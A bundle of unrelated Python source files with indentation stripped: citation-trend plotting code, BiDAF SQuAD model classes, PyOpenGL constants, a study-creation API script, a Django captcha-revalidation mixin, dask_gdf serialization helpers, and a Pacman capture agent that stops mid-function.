ax.set_xlabel('dataset size')
ax.set_ylabel('citation upper limit')
ax.set_xscale('log')
ax.set_yscale('log')
ax.legend()
plt.tight_layout()
plt.savefig('fig/subj_citation_upper_limit_{}.png'.format(tag),dpi=400)
logging.info('fig saved to fig/subj_citation_upper_limit_{}.png.'.format(tag))
def curve_fit_plotting(ax,xs,ys,label):
##对数据的数量进行过滤
start_pos = 0
for i in range(len(xs)):
if xs[i]>10000:
start_pos = i
break
xs = xs[start_pos:]
ys = ys[start_pos:]
line = ax.plot(xs,ys,label=label)
c= line[0].get_color()
def logFunc(x,a,b):
return a*np.log(x)+b
popt, pcov = curve_fit(logFunc, xs, ys)
a = popt[0]
b = popt[1]
ax.plot(xs,[logFunc(x,a,b) for x in xs],'-.',c=c)
## 引用次数最高的N篇论文的平均引用次数
def topN_mean(citnum_dis,N):
cits = []
for key in citnum_dis.keys():
num = citnum_dis[key]
cits.extend([int(key)]*num)
topN = sorted(cits,key=lambda x:int(x),reverse=True)[:N]
mean_of_topNn = np.mean(topN)
return mean_of_topNn
def paper_num_dis_over_pubyear():
## 不同领域随着年份领域论文总数量的变化
logging.info('loading subj year paper num ...')
subj_year_num = json.loads(open('data/subj_year_num.json').read())
plt.figure(figsize = (6,4))
for subj in sorted(subj_year_num.keys()):
year_num = subj_year_num[subj]
xs= []
ys = []
total = 0
for year in sorted(year_num.keys(),key=lambda x:int(x)):
xs.append(int(year))
total+= int(year_num[year])
ys.append(total)
plt.plot(xs,ys,label="{}".format(subj))
plt.xlabel('publication year')
plt.ylabel('total number of papers')
plt.yscale('log')
lgd = plt.legend(loc=6,bbox_to_anchor=(0.5, -0.2), ncol=2)
# plt.legend()
plt.tight_layout()
plt.savefig('fig/subj_year_num_dis.png',dpi=400,additional_artists=[lgd],bbox_inches="tight")
logging.info('paper year num dis saved to fig/subj_year_num_dis.png')
def paper_year_total_citnum(year_citnum):
years = [int(year) for year in year_citnum.keys()]
minY = np.min(years)
maxY = np.max(years)
mY = maxY
if maxY+1<2018:
mY=2018
year_total = {}
total = 0
for y in range(minY,mY):
total+= year_citnum.get(str(y),0)
year_total[int(y)]=total
return year_total
if __name__ == '__main__':
##需要研究的领域的论文id
# get_paperids_of_subjects()
# subjs = ['computer science','physics','chemistry','medicine','art','biology']
# tags = ['cs','physics','chemistry','medicine','art','biology']
# for i in range(len(subjs)):
# subj = subjs[i]
# tag = tags[i]
# ## 统计论文引用次数随着时间的变化
# stats_citation_count_of_papers(subj,tag)
# general_top_citation_trend_over_datasize(subj,tag)
# upper_limit_over_year(subj,tag)
## subj pubyear teamsize over datasize
#
# temporal_top_citation_trend_over_datasize()
stats_citation_dis_over_years()
|
"""Top-level model classes.
Author:
Chris Chute (chute@stanford.edu)
"""
import layers , bert_layers
import torch
import torch.nn as nn
import torch.nn.functional as F
class BiDAF(nn.Module):
"""Baseline BiDAF model for SQuAD.
Based on the paper:
"Bidirectional Attention Flow for Machine Comprehension"
by Minjoon Seo, Aniruddha Kembhavi, Ali Farhadi, Hannaneh Hajishirzi
(https://arxiv.org/abs/1611.01603).
Follows a high-level structure commonly found in SQuAD models:
- Embedding layer: Embed word indices to get word vectors.
- Encoder layer: Encode the embedded sequence.
- Attention layer: Apply an attention mechanism to the encoded sequence.
- Model encoder layer: Encode the sequence again.
- Output layer: Simple layer (e.g., fc + softmax) to get final outputs.
Args:
word_vectors (torch.Tensor): Pre-trained word vectors.
hidden_size (int): Number of features in the hidden state at each layer.
drop_prob (float): Dropout probability.
"""
def __init__(self, word_vectors, hidden_size, drop_prob=0.):
super(BiDAF, self).__init__()
self.emb = layers.Embedding(word_vectors=word_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.enc = layers.RNNEncoder(input_size=hidden_size,
hidden_size=hidden_size,
num_layers=1,
drop_prob=drop_prob)
self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
drop_prob=drop_prob)
self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
hidden_size=hidden_size,
num_layers=2,
drop_prob=drop_prob)
self.out = layers.BiDAFOutput(hidden_size=hidden_size,
drop_prob=drop_prob)
def forward(self, cw_idxs, qw_idxs):
c_mask = torch.zeros_like(cw_idxs) != cw_idxs
q_mask = torch.zeros_like(qw_idxs) != qw_idxs
c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
c_emb = self.emb(cw_idxs) # (batch_size, c_len, hidden_size)
q_emb = self.emb(qw_idxs) # (batch_size, q_len, hidden_size)
c_enc = self.enc(c_emb, c_len) # (batch_size, c_len, 2 * hidden_size)
q_enc = self.enc(q_emb, q_len) # (batch_size, q_len, 2 * hidden_size)
att = self.att(c_enc, q_enc,
c_mask, q_mask) # (batch_size, c_len, 8 * hidden_size)
mod = self.mod(att, c_len) # (batch_size, c_len, 2 * hidden_size)
out = self.out(att, mod, c_mask) # 2 tensors, each (batch_size, c_len)
return out
class BiDAF_charCNN(nn.Module):
"""Baseline BiDAF model for SQuAD.
Based on the paper:
"Bidirectional Attention Flow for Machine Comprehension"
by Minjoon Seo, Aniruddha Kembhavi, Ali Farhadi, Hannaneh Hajishirzi
(https://arxiv.org/abs/1611.01603).
Follows a high-level structure commonly found in SQuAD models:
- Embedding layer: Embed word indices to get word vectors.
- Encoder layer: Encode the embedded sequence.
- Attention layer: Apply an attention mechanism to the encoded sequence.
- Model encoder layer: Encode the sequence again.
- Output layer: Simple layer (e.g., fc + softmax) to get final outputs.
Args:
word_vectors (torch.Tensor): Pre-trained word vectors.
hidden_size (int): Number of features in the hidden state at each layer.
drop_prob (float): Dropout probability.
"""
def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.):
super(BiDAF_charCNN, self).__init__()
self.emb = layers.Embedding(word_vectors=word_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
self.enc = layers.RNNEncoder(input_size=2*hidden_size,
hidden_size=2*hidden_size,
num_layers=1,
drop_prob=drop_prob)
self.att = layers.BiDAFAttention(hidden_size=2 * 2*hidden_size,
drop_prob=drop_prob)
self.mod = layers.RNNEncoder(input_size=8 * 2*hidden_size,
hidden_size=hidden_size,
num_layers=2,
drop_prob=drop_prob)
self.out = layers.BiDAFOutput(hidden_size=hidden_size,
drop_prob=drop_prob)
def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
c_mask = torch.zeros_like(cw_idxs) != cw_idxs
q_mask = torch.zeros_like(qw_idxs) != qw_idxs
c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
c_emb_w = self.emb(cw_idxs) # (batch_size, c_len, hidden_size)
q_emb_w = self.emb(qw_idxs) # (batch_size, q_len, hidden_size)
c_emb_cc = self.char_emb(cc_idxs) # (batch_size, c_len, hidden_size)
q_emb_cc = self.char_emb(qc_idxs) # (batch_size, q_len, hidden_size)
c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
c_enc = self.enc(c_emb, c_len) # (batch_size, c_len, 2 * hidden_size)
q_enc = self.enc(q_emb, q_len) # (batch_size, q_len, 2 * hidden_size)
att = self.att(c_enc, q_enc,
c_mask, q_mask) # (batch_size, c_len, 8 * hidden_size)
mod = self.mod(att, c_len) # (batch_size, c_len, 2 * hidden_size)
out = self.out(att, mod, c_mask) # 2 tensors, each (batch_size, c_len)
return out
class BiDAF_charCNN_BERTEnc(nn.Module):
"""Baseline BiDAF model for SQuAD.
Based on the paper:
"Bidirectional Attention Flow for Machine Comprehension"
by Minjoon Seo, Aniruddha Kembhavi, Ali Farhadi, Hannaneh Hajishirzi
(https://arxiv.org/abs/1611.01603).
Follows a high-level structure commonly found in SQuAD models:
- Embedding layer: Embed word indices to get word vectors.
- Encoder layer: Encode the embedded sequence.
- Attention layer: Apply an attention mechanism to the encoded sequence.
- Model encoder layer: Encode the sequence again.
- Output layer: Simple layer (e.g., fc + softmax) to get final outputs.
Args:
word_vectors (torch.Tensor): Pre-trained word vectors.
hidden_size (int): Number of features in the hidden state at each layer.
drop_prob (float): Dropout probability.
"""
def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.,twist_embeddings=True):
super(BiDAF_charCNN_BERTEnc, self).__init__()
###
self.twist_embeddings = twist_embeddings
idx_list = []
for i in range(hidden_size):
idx_list.append(i)
idx_list.append(hidden_size+i)
self.register_buffer('idx_twist',torch.tensor(idx_list))
###
self.emb = layers.Embedding(word_vectors=word_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
self.enc = bert_layers.BertEncoder(n_layers=6, #n_layers=3,
d_feature=2*hidden_size,
n_heads=8,
out_size=2*hidden_size,
d_ff=2048,
#d_ff = 2*hidden_size,
dropout_prob=0.1,
#dropout_prob=drop_prob,
ff_activation=F.relu)
self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
drop_prob=drop_prob)
self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
hidden_size=hidden_size,
num_layers=2,
drop_prob=drop_prob)
self.out = layers.BiDAFOutput(hidden_size=hidden_size,
drop_prob=drop_prob)
def twist(self,a,b):
assert a.shape == b.shape , 'tensors to be twisted need to have the same size'
idx = self.idx_twist.repeat(a.shape[0],a.shape[1],1)
c = torch.cat([a,b],axis=-1)
return torch.gather(c,-1,idx)
def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
c_mask = torch.zeros_like(cw_idxs) != cw_idxs
q_mask = torch.zeros_like(qw_idxs) != qw_idxs
c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
c_emb_w = self.emb(cw_idxs) # (batch_size, c_len, hidden_size)
q_emb_w = self.emb(qw_idxs) # (batch_size, q_len, hidden_size)
c_emb_cc = self.char_emb(cc_idxs) # (batch_size, c_len, hidden_size)
q_emb_cc = self.char_emb(qc_idxs) # (batch_size, q_len, hidden_size)
if self.twist_embeddings:
c_emb = self.hwy(self.twist(c_emb_w,c_emb_cc))
q_emb = self.hwy(self.twist(q_emb_w,q_emb_cc))
else:
c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
c_enc = self.enc(c_emb) # (batch_size, c_len, 2 * hidden_size)
q_enc = self.enc(q_emb) # (batch_size, q_len, 2 * hidden_size)
att = self.att(c_enc, q_enc,c_mask, q_mask) # (batch_size, c_len, 8 * hidden_size)
mod = self.mod(att, c_len) # (batch_size, c_len, 2 * hidden_size)
out = self.out(att, mod, c_mask) # 2 tensors, each (batch_size, c_len)
return out
class BiDAF_charCNN_BERTEnc_BERTMod(nn.Module):
"""Baseline BiDAF model for SQuAD.
Based on the paper:
"Bidirectional Attention Flow for Machine Comprehension"
by Minjoon Seo, Aniruddha Kembhavi, Ali Farhadi, Hannaneh Hajishirzi
(https://arxiv.org/abs/1611.01603).
Follows a high-level structure commonly found in SQuAD models:
- Embedding layer: Embed word indices to get word vectors.
- Encoder layer: Encode the embedded sequence.
- Attention layer: Apply an attention mechanism to the encoded sequence.
- Model encoder layer: Encode the sequence again.
- Output layer: Simple layer (e.g., fc + softmax) to get final outputs.
Args:
word_vectors (torch.Tensor): Pre-trained word vectors.
hidden_size (int): Number of features in the hidden state at each layer.
drop_prob (float): Dropout probability.
"""
def __init__(self, word_vectors, char_vectors, hidden_size, drop_prob=0.,twist_embeddings=False):
super(BiDAF_charCNN_BERTEnc_BERTMod, self).__init__()
###
self.twist_embeddings = twist_embeddings
idx_list = []
for i in range(hidden_size):
idx_list.append(i)
idx_list.append(hidden_size+i)
self.register_buffer('idx_twist',torch.tensor(idx_list))
###
self.emb = layers.Embedding(word_vectors=word_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.char_emb = layers.CharEmbedding(char_vectors=char_vectors,
hidden_size=hidden_size,
drop_prob=drop_prob)
self.hwy = layers.HighwayEncoder(2, 2*hidden_size)
self.enc = bert_layers.BertEncoder(n_layers=3, #n_layers=4,
d_feature=2*hidden_size,
n_heads=8,
out_size=2*hidden_size,
#d_ff=2048,
d_ff = 2*hidden_size,
dropout_prob=0.1,
#dropout_prob=drop_prob,
ff_activation=F.relu)
self.att = layers.BiDAFAttention(hidden_size=2 * hidden_size,
drop_prob=drop_prob)
self.mod = bert_layers.BertEncoder(n_layers=3, #n_layers=3,
d_feature=8*hidden_size,
n_heads=8,
out_size=2*hidden_size,
#d_ff=2048,
d_ff = 2*hidden_size,
dropout_prob=0.1,
#dropout_prob=drop_prob,
ff_activation=F.relu)
# self.mod = layers.RNNEncoder(input_size=8 * hidden_size,
# hidden_size=hidden_size,
# num_layers=2,
# drop_prob=drop_prob)
self.out = layers.BiDAFOutput(hidden_size=hidden_size,
drop_prob=drop_prob)
def twist(self,a,b):
assert a.shape == b.shape , 'tensors to be twisted need to have the same size'
idx = self.idx_twist.repeat(a.shape[0],a.shape[1],1)
c = torch.cat([a,b],axis=-1)
return torch.gather(c,-1,idx)
def forward(self, cw_idxs, cc_idxs, qw_idxs, qc_idxs):
c_mask = torch.zeros_like(cw_idxs) != cw_idxs
q_mask = torch.zeros_like(qw_idxs) != qw_idxs
c_len, q_len = c_mask.sum(-1), q_mask.sum(-1)
c_emb_w = self.emb(cw_idxs) # (batch_size, c_len, hidden_size)
q_emb_w = self.emb(qw_idxs) # (batch_size, q_len, hidden_size)
c_emb_cc = self.char_emb(cc_idxs) # (batch_size, c_len, hidden_size)
q_emb_cc = self.char_emb(qc_idxs) # (batch_size, q_len, hidden_size)
if self.twist_embeddings:
c_emb = self.hwy(self.twist(c_emb_w,c_emb_cc))
q_emb = self.hwy(self.twist(q_emb_w,q_emb_cc))
else:
c_emb = self.hwy(torch.cat([c_emb_w,c_emb_cc],axis=-1))
q_emb = self.hwy(torch.cat([q_emb_w,q_emb_cc],axis=-1))
c_enc = self.enc(c_emb) # (batch_size, c_len, 2 * hidden_size)
q_enc = self.enc(q_emb) # (batch_size, q_len, 2 * hidden_size)
att = self.att(c_enc, q_enc,c_mask, q_mask) # (batch_size, c_len, 8 * hidden_size)
mod = self.mod(att) # (batch_size, c_len, 2 * hidden_size)
out = self.out(att, mod, c_mask) # 2 tensors, each (batch_size, c_len)
return out
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES1 import _types as _cs
# End users want this...
from OpenGL.raw.GLES1._types import *
from OpenGL.raw.GLES1 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES1_IMG_texture_compression_pvrtc'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES1,'GLES1_IMG_texture_compression_pvrtc',error_checker=_errors._error_checker)
GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG=_C('GL_COMPRESSED_RGBA_PVRTC_2BPPV1_IMG',0x8C03)
GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG=_C('GL_COMPRESSED_RGBA_PVRTC_4BPPV1_IMG',0x8C02)
GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG=_C('GL_COMPRESSED_RGB_PVRTC_2BPPV1_IMG',0x8C01)
GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG=_C('GL_COMPRESSED_RGB_PVRTC_4BPPV1_IMG',0x8C00)
|
import os
import json
import argparse
from management_api import ManagementAPIClient
from utils import read_yaml, should_use_external_idp
import base64
def yaml_obj_to_loc_object(obj):
loc_obj = []
for k in obj.keys():
loc_obj.append({
"code": k,
"parts": [{
"str": obj[k]
}]
})
return loc_obj
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--global_config_yaml", help="global configuration file path", default=os.path.join('resources', 'config.yaml'))
parser.add_argument(
"--study_def_path", help="folder with study def yaml and rules json", required=True)
args = parser.parse_args()
configs = read_yaml(args.global_config_yaml)
user_credentials = configs["user_credentials"]
management_api_url = configs["management_api_url"]
use_external_idp = should_use_external_idp(configs)
study_path = args.study_def_path
print(study_path)
study_def = read_yaml(os.path.join(study_path, "props.yaml"))
rules = json.load(
open(os.path.join(study_path, "study_rules.json"), 'r', encoding='UTF-8'))
study_obj = {
"study": {
"key": study_def["studyKey"],
"status": study_def["status"],
"secretKey": study_def["secretKey"],
"props": {
"systemDefaultStudy": study_def["props"]["systemDefaultStudy"],
"startDate": study_def["props"]["startDate"],
"name": yaml_obj_to_loc_object(study_def["props"]["name"]),
"description": yaml_obj_to_loc_object(study_def["props"]["name"]),
"tags": [{"label": yaml_obj_to_loc_object(t)} for t in study_def["props"]["tags"]]
},
"rules": rules
}
}
if "configs" in study_def.keys():
allowParticipantFiles = study_def["configs"]["allowParticipantFiles"]
idMappingMethod = study_def["configs"]["idMappingMethod"]
study_obj["study"]["configs"] = {
"participantFileUploadRule": {
"name": "gt",
"data": [
{ "dtype": "num", "num": 1},
{ "dtype": "num", "num": 0 if allowParticipantFiles == True else 2 }
]
},
"idMappingMethod": idMappingMethod
}
client = ManagementAPIClient(
management_api_url, user_credentials, use_external_idp=use_external_idp)
client.create_study(study_obj)
|
class PreventCaptchaRevalidationMixin:
"""When get_all_cleaned_data() is called the forms are revalidated,
which causes captcha to fail becuase the same captcha response from google
is posted to google multiple times. This captcha response is a nonce, and
so google complains the second time it's seen.
This is worked around by removing captcha from the form before the view
calls get_all_cleaned_data
"""
should_ignore_captcha = False
def render_done(self, *args, **kwargs):
self.should_ignore_captcha = True
return super().render_done(*args, **kwargs)
def get_form(self, step=None, *args, **kwargs):
form = super().get_form(step=step, *args, **kwargs)
if self.should_ignore_captcha:
form.fields.pop('captcha', None)
return form
|
import os
import sys
from types import MethodType
# A flag to allow dask_gdf to detect and warn if
# IPC serialization is unavailable
CUSTOM_SERIALIZATION_AVAILABLE = False
try:
import distributed.protocol as _dp
from distributed.utils import has_keyword
except ImportError:
def register_distributed_serializer(cls):
"""Dummy no-op function.
"""
pass
else:
CUSTOM_SERIALIZATION_AVAILABLE = True
def register_distributed_serializer(cls):
"""Register serialization methods for dask.distributed.
"""
_dp.register_serialization(cls, _serialize, _deserialize)
def has_context_keyword(meth):
if isinstance(meth, MethodType):
return has_keyword(meth.__func__, 'context')
else:
return has_keyword(meth, 'context')
def _serialize(df, context=None):
def do_serialize(x):
return _dp.serialize(x, context=context)
def call_with_context(meth, x):
if has_context_keyword(meth):
return meth(x, context=context)
else:
return meth(x)
header, frames = call_with_context(df.serialize, do_serialize)
assert 'reconstructor' not in header
meth_deserial = getattr(type(df), 'deserialize')
header['reconstructor'] = do_serialize(meth_deserial)
return header, frames
def _deserialize(header, frames):
reconstructor = _dp.deserialize(*header['reconstructor'])
assert reconstructor is not None, 'None {}'.format(header['type'])
return reconstructor(_dp.deserialize, header, frames)
def _parse_transfer_context(context):
from distributed.comm.addressing import parse_host_port, parse_address
def parse_it(x):
return parse_host_port(parse_address(x)[1])
if 'recipient' in context and 'sender' in context:
rechost, recport = parse_it(context['recipient'])
senhost, senport = parse_it(context['sender'])
same_node = rechost == senhost
same_process = same_node and recport == senport
else:
same_node, same_process = False, False
return same_node, same_process
_CONFIG_USE_IPC = bool(int(os.environ.get("DASK_GDF_USE_IPC", "1")))
def should_use_ipc(context):
"""Use destination context info to determine if we should use CUDA-IPC.
Parameters
----------
context : dict or None
If not ``None``, it contains information about the destination.
See custom serialization in dask.distributed.
Returns
-------
return_value : bool
``True`` if it is possible to perform CUDA IPC transfer to the
destination.
"""
# User opt-out
if not _CONFIG_USE_IPC:
return False
# CUDA IPC is only supported on Linux
if not sys.platform.startswith('linux'):
return False
# *context* is not given.
if context is None:
return False
# Check if destination on the same
same_node, same_process = _parse_transfer_context(context)
return bool(same_node)
|
# baselineTeam.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# baselineTeam.py
# ---------------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
from captureAgents import CaptureAgent
import distanceCalculator
import random, time, util, sys
from game import Directions
import game
from util import nearestPoint
#################
# Team creation #
#################
import sys
sys.path.append("teams/<montecarlo>/")
def createTeam(firstIndex, secondIndex, isRed,
first='OffensiveReflexAgent', second='DefensiveReflexAgent'):
"""
This function should return a list of two agents that will form the
team, initialized using firstIndex and secondIndex as their agent
index numbers. isRed is True if the red team is being created, and
will be False if the blue team is being created.
As a potentially helpful development aid, this function can take
additional string-valued keyword arguments ("first" and "second" are
such arguments in the case of this function), which will come from
the --redOpts and --blueOpts command-line arguments to capture.py.
For the nightly contest, however, your team will be created without
any extra arguments, so you should make sure that the default
behavior is what you want for the nightly contest.
"""
return [eval(first)(firstIndex), eval(second)(secondIndex)]
##########
# Agents #
##########
class ReflexCaptureAgent(CaptureAgent):
"""
A base class for reflex agents that chooses score-maximizing actions
"""
def registerInitialState(self, gameState):
self.start = gameState.getAgentPosition(self.index)
CaptureAgent.registerInitialState(self, gameState)
def getSuccessor(self, gameState, action):
"""
Finds the next successor which is a grid position (location tuple).
"""
successor = gameState.generateSuccessor(self.index, action)
pos = successor.getAgentState(self.index).getPosition()
if pos != nearestPoint(pos):
# Only half a grid position was covered
return successor.generateSuccessor(self.index, action)
else:
return successor
def evaluate(self, gameState, action):
"""
Computes a linear combination of features and feature weights
"""
features = self.getFeatures(gameState, action)
weights = self.getWeights(gameState, action)
return features * weights
def getFeatures(self, gameState, action):
"""
Returns a counter of features for the state
"""
features = util.Counter()
successor = self.getSuccessor(gameState, action)
features['successorScore'] = self.getScore(successor)
return features
def getWeights(self, gameState, action):
"""
Normally, weights do not depend on the gamestate. They can be either
a counter or a dictionary.
"""
return {'successorScore': 1.0}
class OffensiveReflexAgent(ReflexCaptureAgent):
"""
A reflex agent that seeks food. This is an agent
we give you to get an idea of what an offensive agent might look like,
but it is by no means the best or only way to build an offensive agent.
"""
def getFeatures(self, gameState, action):
"""
Get features used for state evaluation.
"""
features = util.Counter()
successor = self.getSuccessor(gameState, action)
# Compute score from successor state
features['successorScore'] = self.getScore(successor)
# get current position of the agent
myPos = successor.getAgentState(self.index).getPosition()
# Compute distance to the nearest food
foodList = self.getFood(successor).asList()
if len(foodList) > 0:
minDistance = min([self.getMazeDistance(myPos, food) for food in foodList])
features['distanceToFood'] = minDistance
# Compute distance to closest ghost
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
inRange = filter(lambda x: not x.isPacman and x.getPosition() != None, enemies)
if len(inRange) > 0:
positions = [agent.getPosition() for agent in inRange]
closest = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closest)
if closestDist <= 5:
# print(myPos,closest,closestDist)
features['distanceToGhost'] = closestDist
else:
probDist = []
for i in self.getOpponents(successor):
probDist.append(successor.getAgentDistances()[i])
features['distanceToGhost'] = min(probDist)
enemiesPacMan = [successor.getAgentState(i) for i in self.getOpponents(successor)]
Range = filter(lambda x: x.isPacman and x.getPosition() != None, enemiesPacMan)
if len(Range) > 0:
positions = [agent.getPosition() for agent in Range]
closest = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closest)
if closestDist < 4:
# print(myPos,closest,closestDist)
features['distanceToEnemiesPacMan'] = closestDist
else:
features['distanceToEnemiesPacMan'] = 0
# Compute distance to the nearest capsule
capsuleList = self.getCapsules(successor)
if len(capsuleList) > 0:
minDistance = min([self.getMazeDistance(myPos, c) for c in capsuleList])
features['distanceToCapsule'] = minDistance
else:
features['distanceToCapsule'] = 0
# Compute if is pacman
features['isPacman'] = 1 if successor.getAgentState(self.index).isPacman else 0
# features['distanceToMid'] = min([self.cap.distancer.getDistance(myPos, i)
# for i in self.noWallSpots])
# Compute the distance to the nearest boundary
boundaryMin = 1000000
for i in range(len(self.boundary)):
disBoundary = self.getMazeDistance(myPos, self.boundary[i])
if (disBoundary < boundaryMin):
boundaryMin = disBoundary
features['returned'] = boundaryMin
features['carrying'] = successor.getAgentState(self.index).numCarrying
return features
def getWeights(self, gameState, action):
"""
Get weights for the features used in the evaluation.
"""
# If opponent is scared, the agent should not care about distanceToGhost
successor = self.getSuccessor(gameState, action)
numOfFood = len(self.getFood(successor).asList())
numOfCarrying = successor.getAgentState(self.index).numCarrying
myPos = successor.getAgentState(self.index).getPosition()
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
inRange = filter(lambda x: not x.isPacman and x.getPosition() != None, enemies)
if len(inRange) > 0:
"""
positions = [agent.getPosition() for agent in inRange]
closestPos = min(positions, key=lambda x: self.getMazeDistance(myPos, x))
closestDist = self.getMazeDistance(myPos, closestPos)
closest_enemies = filter(lambda x: x[0] == closestPos, zip(positions, inRange))"""
for agent in inRange:
if agent.scaredTimer > 0:
if agent.scaredTimer > 6:
return {'successorScore': 50, 'distanceToFood': -5, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 0, 'distanceToCapsule': 0, 'returned': -10, 'carrying': 20}
elif 3 < agent.scaredTimer <= 6 and numOfCarrying >= 7:
return {'successorScore': 510, 'distanceToFood': -3, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 2, 'distanceToCapsule': 0, 'returned': -100,
'carrying': 20}
elif numOfCarrying == 0 and not successor.getAgentState(self.index).isPacman:
return {'successorScore': 23, 'distanceToFood': -3, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 1, 'distanceToCapsule': -5, 'returned': 0, 'carrying': 20}
else:
return {'successorScore': 510, 'distanceToFood': -1, 'distanceToEnemiesPacMan': 0,
'distanceToGhost': 40, 'distanceToCapsule': -51, 'returned': -100, 'carring': 20}
# If I am not PacMan the enemy is a pacMan, I can try to eliminate him
# Attacker only try to defence if it is close to it (less than 4 steps)
enemiesPacMan = [successor.getAgentState(i) for i in self.getOpponents(successor)]
Range = filter(lambda x: x.isPacman and x.getPosition() != None, enemiesPacMan)
if len(Range) > 0 and not successor.getAgentState(self.index).isPacman:
return {'successorScore': 2, 'distanceToFood': -3, 'distanceToEnemiesPacMan': -500,
'distanceToCapsule': 0, 'distanceToGhost': 0,
'returned': 0, 'carrying': 20}
# Weights normally used
# if 2<= numOfFood <=6:
# return {'successorScore': 0, 'distanceToFood': 0,
# 'distanceToGhost': 20, 'distanceToCapsule': 0, 'returned': 0, 'carring': 0}
if gameState.getAgentState(self.index).numCarrying == 7:
return {'successorScore': 500, 'distanceToFood': 10, 'distanceToGhost': 20, 'distanceToEnemiesPacMan': 0,
'distanceToCapsule': -55, 'returned': -1000, 'carrying': 0}
return {'successorScore': 30, 'distanceToFood': -5, 'distanceToGhost': 0, 'distanceToEnemiesPacMan': 0,
'distanceToCapsule': -3, 'returned': 0, 'carrying': 35}
def allSimulation(self, depth, gameState, decay):
new_state = gameState.deepCopy()
if depth == 0:
result_list = []
actions = new_state.getLegalActions(self.index)
actions.remove(Directions.STOP)
"""
reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
if reversed_direction in actions and len(actions) > 1:
actions.remove(reversed_direction)"""
a = random.choice(actions)
next_state = new_state.generateSuccessor(self.index, a)
result_list.append(self.evaluate(next_state, Directions.STOP))
return max(result_list)
# Get valid actions
result_list = []
actions = new_state.getLegalActions(self.index)
# The agent should not stay put in the simulation
# actions.remove(Directions.STOP)
# current_direction = new_state.getAgentState(self.index).configuration.direction
# The agent should not use the reverse direction during simulation
"""
reversed_direction = Directions.REVERSE[current_direction]
if reversed_direction in actions and len(actions) > 1:
actions.remove(reversed_direction)
"""
# Randomly chooses a valid action
for a in actions:
# Compute new state and update depth
next_state = new_state.generateSuccessor(self.index, a)
result_list.append(
self.evaluate(next_state, Directions.STOP) + decay * self.allSimulation(depth - 1, next_state, decay))
return max(result_list)
def randomSimulation(self, depth, gameState, decay):
"""
Random simulate some actions for the agent. The actions other agents can take
are ignored, or, in other words, we consider their actions is always STOP.
The final state from the simulation is evaluated.
"""
new_state = gameState.deepCopy()
value = self.evaluate(new_state, Directions.STOP)
decay_index = 1
while depth > 0:
# Get valid actions
actions = new_state.getLegalActions(self.index)
# The agent should not stay put in the simulation
# actions.remove(Directions.STOP)
current_direction = new_state.getAgentState(self.index).configuration.direction
# The agent should not use the reverse direction during simulation
reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
if reversed_direction in actions and len(actions) > 1:
actions.remove(reversed_direction)
# Randomly chooses a valid action
a = random.choice(actions)
# Compute new state and update depth
new_state = new_state.generateSuccessor(self.index, a)
value = value + decay ** decay_index * self.evaluate(new_state, Directions.STOP)
depth -= 1
decay_index += 1
# Evaluate the final simulation state
return value
def randomSimulation1(self, depth, gameState):
"""
Random simulate some actions for the agent. The actions other agents can take
are ignored, or, in other words, we consider their actions is always STOP.
The final state from the simulation is evaluated.
"""
new_state = gameState.deepCopy()
while depth > 0:
# Get valid actions
actions = new_state.getLegalActions(self.index)
# The agent should not stay put in the simulation
